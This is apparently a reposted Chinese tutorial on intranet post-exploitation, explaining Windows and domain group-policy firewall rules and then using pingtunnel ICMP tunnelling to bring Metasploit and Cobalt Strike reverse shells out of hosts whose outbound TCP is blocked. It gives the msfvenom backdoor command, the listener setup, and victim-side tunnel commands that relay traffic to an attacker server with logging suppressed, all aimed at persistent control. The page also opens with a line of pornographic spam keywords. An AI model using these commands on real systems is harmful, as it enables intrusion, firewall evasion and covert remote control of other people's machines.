国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

內(nèi)網(wǎng)安全:初探隧道技術(shù)

這篇具有很好參考價值的文章主要介紹了內(nèi)網(wǎng)安全:初探隧道技術(shù)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

目錄

防火墻必備知識

域控-防火墻組策略對象同步

域控 - 防火墻組策略不出網(wǎng)上線

MSF上線

CS - ICMP上線

注意:隧道技術(shù)是后滲透手段,是在已經(jīng)取得權(quán)限后的手段

域控-組策略同步


內(nèi)網(wǎng)安全:初探隧道技術(shù)

防火墻必備知識

學習防火墻的目標是知道了解防火墻的一些常見配置對內(nèi)網(wǎng)滲透的影響,并不需要像運維一樣全面了解防火墻

參考資料:Windows防火墻限制端口/IP/應用訪問的方法以及例外的配置

這是阿里云關(guān)于windows運維的文檔,里面有常見的winodws防火墻配置?

防火墻(Firewall)是一種網(wǎng)絡安全設備或軟件,用于監(jiān)控和控制網(wǎng)絡流量,以保護計算機和網(wǎng)絡免受未經(jīng)授權(quán)的訪問、惡意攻擊和網(wǎng)絡威脅。防火墻通過建立規(guī)則和過濾器來管理進出網(wǎng)絡的數(shù)據(jù)流,以確保只有授權(quán)的數(shù)據(jù)能夠通過。

防火墻的主要功能包括:

  1. 包過濾:防火墻檢查傳入和傳出網(wǎng)絡的數(shù)據(jù)包,并根據(jù)預定義的規(guī)則集來決定是否允許通過。這些規(guī)則基于源IP地址、目標IP地址、端口號、協(xié)議類型等來過濾數(shù)據(jù)包。
  2. 狀態(tài)檢測:防火墻可以追蹤網(wǎng)絡連接的狀態(tài),并僅允許與已建立連接相關(guān)的響應數(shù)據(jù)包通過。這有助于防止未經(jīng)授權(quán)的外部主機訪問內(nèi)部網(wǎng)絡。
  3. 網(wǎng)絡地址轉(zhuǎn)換(NAT):防火墻可以執(zhí)行網(wǎng)絡地址轉(zhuǎn)換,將內(nèi)部私有IP地址轉(zhuǎn)換為公共IP地址,以增強網(wǎng)絡安全和隱私。
  4. 應用程序過濾:一些高級防火墻還可以檢查數(shù)據(jù)包中的應用層信息,例如應用程序協(xié)議、有效載荷內(nèi)容等,以便更精確地控制應用程序級別的訪問和流量。
  5. 虛擬專用網(wǎng)絡(VPN)支持:一些防火墻具有VPN功能,可以提供安全的遠程訪問和加密通信,使遠程用戶能夠安全地連接到內(nèi)部網(wǎng)絡。

通過配置適當?shù)姆阑饓σ?guī)則和策略,可以有效保護計算機和網(wǎng)絡免受來自互聯(lián)網(wǎng)和其他網(wǎng)絡的潛在威脅。防火墻通常被廣泛用于企業(yè)網(wǎng)絡和個人計算機,作為網(wǎng)絡安全的重要組成部分。

關(guān)于出站,入站規(guī)則:這個出站,入站是針對服務而言的。對于一個Web站點,配置入站規(guī)則就是檢測訪問我們的流量,出站規(guī)則就是檢測本機出去的流量。

防火墻根據(jù)用戶不同網(wǎng)絡環(huán)境有不同的防火墻。比如:

  1. 主機在域內(nèi)的規(guī)則配置
  2. 主機對某個目標的規(guī)則配置
  3. 主機對公網(wǎng)的規(guī)則配置

在生活中,我們可以運行某個執(zhí)行程序,系統(tǒng)會提示我們是否允許該應用訪問公網(wǎng)網(wǎng)絡。

內(nèi)網(wǎng)安全:初探隧道技術(shù)

還可以根據(jù)具體的協(xié)議,端口進行規(guī)則設置

內(nèi)網(wǎng)安全:初探隧道技術(shù)

?還可以針對具體的協(xié)議進行出入站限制

內(nèi)網(wǎng)安全:初探隧道技術(shù)


有些破解軟件的重要一步就是防止軟件與外部網(wǎng)絡進行連接,就會將該程序的出入站規(guī)則全部禁用。

域控-防火墻組策略對象同步

在域中,可以通過組策略對域內(nèi)所有設備進行配置防火墻規(guī)則

新建一個策略進行編輯

內(nèi)網(wǎng)安全:初探隧道技術(shù)

?這下圖進行配置

內(nèi)網(wǎng)安全:初探隧道技術(shù)

配置規(guī)則

內(nèi)網(wǎng)安全:初探隧道技術(shù)

強制執(zhí)行

內(nèi)網(wǎng)安全:初探隧道技術(shù)

域內(nèi)服務器也可使用命令更新:

gpupdate/force

內(nèi)網(wǎng)安全:初探隧道技術(shù)

內(nèi)網(wǎng)安全:初探隧道技術(shù)

域成員強制同步DC域防火墻策略

域控 - 防火墻組策略不出網(wǎng)上線

背景介紹:域控通過組策略設置防火墻規(guī)則同步后,域內(nèi)用戶主機被限制TCP出網(wǎng),其中規(guī)則為出站規(guī)則

你可以Ping通百度,但無法訪問百度網(wǎng)頁。兩個協(xié)議不一樣!

思路:正向連接&隧道技術(shù)
如果是入站被限制呢?反向連接&隧道技術(shù)也可以解決

這里將會以ICMP協(xié)議為例,ICMP協(xié)議是Ping命令走的協(xié)議

項目地址:

https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

這里我們實驗是模擬DC禁用域成員主機TCP

內(nèi)網(wǎng)安全:初探隧道技術(shù)

實戰(zhàn)中,TCP封殺的策略:

主機出站TCP封殺 入站無法鏈接外網(wǎng)

  • 采用正向連接:取得一臺有網(wǎng)絡的能和主機通訊的服務器權(quán)限(能連外網(wǎng))
  • 把數(shù)據(jù)給能出網(wǎng)的機器,通過這臺機器進行正向鏈接控制它

主機出站TCP封殺 入站可以鏈接外網(wǎng)

  • 采用正向連接
  • 或者隧道技術(shù):走其它協(xié)議出網(wǎng)

這里的實驗是把TCP的數(shù)據(jù)封裝到ICMP協(xié)議里帶出來。因為目標ICMP未被禁止。ICMP隧道技術(shù),在目標服務器中開啟腳本負責將后門的TCP流量轉(zhuǎn)入到ICMP協(xié)議中,kali中開啟腳本負責監(jiān)聽和接受信息

隧道技術(shù)對比代理技術(shù):

隧道技術(shù):解決不出網(wǎng)協(xié)議上線的問題,利用可出網(wǎng)協(xié)議封裝

代理技術(shù):解決網(wǎng)絡通訊不通的問題,利用跳板機建立節(jié)點

這兩種操作是已經(jīng)取得該目標的system權(quán)限后,為了把權(quán)限移交出來而使用的,實現(xiàn)持久化控制。

MSF上線

MSF生成后門:

注意這里是127.0.0.1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4455 -f exe > msf.exe

將TCP的流量發(fā)送到自己的4455端口

MSF啟動監(jiān)聽:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit 

啟動工具,它的作用是把發(fā)送ICMP流量還原位TCP流量再被MSF接收?

./pingtunnel -type server     需要在目標主機上執(zhí)行 需要高權(quán)限

內(nèi)網(wǎng)安全:初探隧道技術(shù)

目標機器上啟動工具,執(zhí)行下面命令:

pingtunnel.exe -type client -l 127.0.0.1:4455 -s 47.94.xx.xx -t 47.94.xx.xx:4444 -tcp 1 -noprint 1 -nolog 1

它可以把本地3333端口接收的TCP流量封裝到ICMP協(xié)議里面,轉(zhuǎn)發(fā)個MSF所在主機。

內(nèi)網(wǎng)安全:初探隧道技術(shù)

上線?。?!

CS - ICMP上線

配置第一個監(jiān)聽器:

內(nèi)網(wǎng)安全:初探隧道技術(shù)

使用這個監(jiān)聽器生成后門

內(nèi)網(wǎng)安全:初探隧道技術(shù)

這個后門設置的原因和上面MSF是一樣的,不再贅述。

生成第一個監(jiān)聽器

內(nèi)網(wǎng)安全:初探隧道技術(shù)

?用來接收反彈

攻擊機上運行:

./pingtunnel -type server

被攻擊機上運行:

pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1

之后會在第二個監(jiān)聽器上接收到連接

內(nèi)網(wǎng)安全:初探隧道技術(shù)

注意:隧道技術(shù)是后滲透手段,是在已經(jīng)取得權(quán)限后的手段

域控-組策略同步

域控進行了設置,所有的域內(nèi)機器都要受到影響,委派下發(fā)

軟件安裝,密碼更改等等

內(nèi)網(wǎng)安全:初探隧道技術(shù)

比如:給域內(nèi)主機設置同一壁紙

內(nèi)網(wǎng)安全:初探隧道技術(shù)

壁紙所在目錄設置共享

內(nèi)網(wǎng)安全:初探隧道技術(shù)

域內(nèi)主機都能看到

內(nèi)網(wǎng)安全:初探隧道技術(shù)

完成設置,查看效果:

內(nèi)網(wǎng)安全:初探隧道技術(shù)文章來源地址http://www.zghlxwxcb.cn/news/detail-467646.html

到了這里,關(guān)于內(nèi)網(wǎng)安全:初探隧道技術(shù)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關(guān)文章

  • Linux系統(tǒng)安全:安全技術(shù)和防火墻

    Linux系統(tǒng)安全:安全技術(shù)和防火墻

    入侵檢測系統(tǒng)(Intrusion Detection Systems): 特點是不阻斷任何網(wǎng)絡訪問,量化、定位來自內(nèi)外網(wǎng)絡的威脅情況,主要以提供報警和事后監(jiān)督為主,提供有針對性的指導措施和安全決策依據(jù),類似于監(jiān)控系統(tǒng),一般采用旁路部署的方式。 以透明模式工作,分析數(shù)據(jù)包的內(nèi)容如: 溢出攻擊

    2024年02月02日
    瀏覽(22)
  • Linux系統(tǒng)安全:安全技術(shù) 和 防火墻 (一)

    Linux系統(tǒng)安全:安全技術(shù) 和 防火墻 (一)

    入侵檢測系統(tǒng)(Intrusion Detection Systems):特點是不阻斷任何網(wǎng)絡訪問,量化、定位來自內(nèi)外網(wǎng)絡的威脅情況,主要以提供報警和事后監(jiān)督為主,提供有針對性的指導措施和安全決策依據(jù),類 似于監(jiān)控系統(tǒng)一般采用旁路部署(默默的看著你)方式。 入侵防御系統(tǒng)(Intrusion Preve

    2024年02月20日
    瀏覽(21)
  • 信息安全:防火墻技術(shù)原理與應用.

    信息安全:防火墻技術(shù)原理與應用.

    防火墻是網(wǎng)絡安全區(qū)域邊界保護的重要技術(shù)。為了應對網(wǎng)絡威脅,聯(lián)網(wǎng)的機構(gòu)或公司將自己的網(wǎng)絡與公共的不可信任的網(wǎng)絡進行隔離,其方法是根據(jù)網(wǎng)絡的安全信任程度和需要保護的對象,人為地劃分若干安全區(qū)域,這些安全區(qū)域有:公共外部網(wǎng)絡;內(nèi)聯(lián)網(wǎng);外聯(lián)網(wǎng)(內(nèi)聯(lián)網(wǎng)

    2024年02月12日
    瀏覽(23)
  • 防火墻技術(shù)之安全區(qū)域

    防火墻技術(shù)之安全區(qū)域

    安全區(qū)域(Security Zone),簡稱為區(qū)域(Zone)。安全區(qū)域是一個或多個接口的集合,防火墻通過安全區(qū)域來劃分網(wǎng)絡、標識報文流動的“路線”。一般來說,當報文在不同的安全區(qū)域之間流動時才會受到控制。 默認情況下,報文在不同的安全區(qū)域之間流動時受到控制,報文在

    2024年02月01日
    瀏覽(21)
  • 信息安全-防火墻技術(shù)原理與應用

    信息安全-防火墻技術(shù)原理與應用

    為了應對網(wǎng)絡威脅,聯(lián)網(wǎng)的 機構(gòu)或公司 將自己的網(wǎng)絡與公共的不可信任的網(wǎng)絡進行隔離 方法: 根據(jù) 網(wǎng)絡的安全信任程度 和 需要保護的對象 , 人為劃分 若干安全區(qū)域,包括: 公共外部網(wǎng)絡 ,如Internet(外網(wǎng)) 內(nèi)聯(lián)網(wǎng) (Intranet) ,如某個公司或組織的專用網(wǎng)絡,網(wǎng)絡訪問限制

    2024年02月04日
    瀏覽(21)
  • 【網(wǎng)絡安全】2.1 防火墻技術(shù)

    【網(wǎng)絡安全】2.1 防火墻技術(shù)

    防火墻是網(wǎng)絡安全防御的重要組成部分,它的主要任務是阻止或限制不安全的網(wǎng)絡通信。在這篇文章中,我們將詳細介紹防火墻的工作原理,類型以及如何配置和使用防火墻。我們將盡可能使用簡單的語言和實例,以便于初學者理解。 防火墻是一種設備或一套軟件,它位于你

    2024年02月08日
    瀏覽(25)
  • linux  iptables安全技術(shù)與防火墻

    linux iptables安全技術(shù)與防火墻

    一、入侵檢測系統(tǒng) 二、防火墻 1.特點 2.防火墻分類 3.按實現(xiàn)方式劃分 4.按網(wǎng)絡協(xié)議劃分 5.Netfilter 6.iptables 三、防水墻 四、tcpdump抓包 五、實驗演示 1.SNAT? ? ? ? ? ? ? ? ? ? ? ? ? ? 是不阻斷任何網(wǎng)絡訪問,量化、定位來自內(nèi)外網(wǎng)絡的威脅情況, 主要以提供報警和事后監(jiān)督

    2024年02月08日
    瀏覽(27)
  • 華為防火墻SSL VPN隧道連接實驗配置

    華為防火墻SSL VPN隧道連接實驗配置

    用于遠程訪問VPN,工作在應用層與傳輸層之間 SSL VPN是以SSL協(xié)議為安全基礎的VPN遠程接入技術(shù),移動辦公人員(在SSL VPN中被稱為遠程用戶)使用SSL VPN可以安全、方便的接入企業(yè)內(nèi)網(wǎng),訪問企業(yè)內(nèi)網(wǎng)資源,提高工作效率。 SSL與IPSec、L2TP的區(qū)別: 1.IPSec、L2TP缺點:遠程用戶終端

    2024年02月12日
    瀏覽(17)
  • 《計算機系統(tǒng)與網(wǎng)絡安全》 第十章 防火墻技術(shù)

    《計算機系統(tǒng)與網(wǎng)絡安全》 第十章 防火墻技術(shù)

    ???? 博主 libin9iOak帶您 Go to New World.??? ?? 個人主頁——libin9iOak的博客?? ?? 《面試題大全》 文章圖文并茂??生動形象??簡單易學!歡迎大家來踩踩~?? ?? 《IDEA開發(fā)秘籍》學會IDEA常用操作,工作效率翻倍~?? ???? 希望本文能夠給您帶來一定的幫助??文章粗淺,敬

    2024年02月11日
    瀏覽(24)
  • 思科ASA防火墻:內(nèi)網(wǎng)telnet遠程控制防火墻 && 外網(wǎng)ssh遠程控制防火墻

    思科ASA防火墻:內(nèi)網(wǎng)telnet遠程控制防火墻 && 外網(wǎng)ssh遠程控制防火墻

    現(xiàn)在他們相互都可以通信 全局通信 1.內(nèi)網(wǎng)telnet連接ASA 進入asa防火墻全局模式 telnet 192.168.1.1 255.255.255.0 in telnet + 指定遠程ip + 子網(wǎng)掩碼 +接口名稱in=e0/1 如果想讓全部都可以連接 telnet 0.0.0.0 0.0.0.0 in passwd 123 ?設置連接密碼 pass + 自定義密碼 ? ? 2.外網(wǎng)ssh遠程連接asa防火墻 進入

    2023年04月11日
    瀏覽(17)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包